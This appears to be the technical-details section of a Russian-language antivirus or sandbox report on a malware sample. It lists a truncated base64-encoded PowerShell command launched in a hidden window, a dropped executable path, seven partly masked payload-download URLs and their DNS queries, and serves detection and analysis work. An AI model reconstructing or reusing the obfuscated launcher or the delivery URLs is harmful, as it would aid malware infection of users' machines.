Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAMQA5ADgAdABjAD0AKAAoACcATABrACcAKwAnAG0AJwApACsAJwA3ACcAKwAoACcAYwAnACsAJwBoAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAUwBFAHIAUABSAE8AZgBpAG...
- %HOMEPATH%\lchrk0d\ju3l9ah\cvkwsu7_2.exe
- http://mm###ring.de/alt-strato/ENQnQbMFcyz/
- http://mu###ersum.com/cgi-bin/attach/wJmPmWFZRU/
- http://sc##ink.net/file/file/AYcTpgPvKrjnc/
- http://we####gansbergen.de/cgi-bin/file/dnxsUNfow/
- http://my##buch.de/Alt/attach/iSd/
- http://ne####hnology.info/cgi-bin/C6wBSadg9e0313/
- http://le####at-rauthe.de/cgi-bin/oiwqqIFJcs/
- DNS ASK mm###ring.de
- DNS ASK mu###ersum.com
- DNS ASK sc##ink.net
- DNS ASK we####gansbergen.de
- DNS ASK my##buch.de
- DNS ASK ne####hnology.info
- DNS ASK le####at-rauthe.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAMQA5ADgAdABjAD0AKAAoACcATABrACcAKwAnAG0AJwApACsAJwA3ACcAKwAoACcAYwAnACsAJwBoAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAUwBFAHIAUABSAE8AZgBpAG...' (со скрытым окном)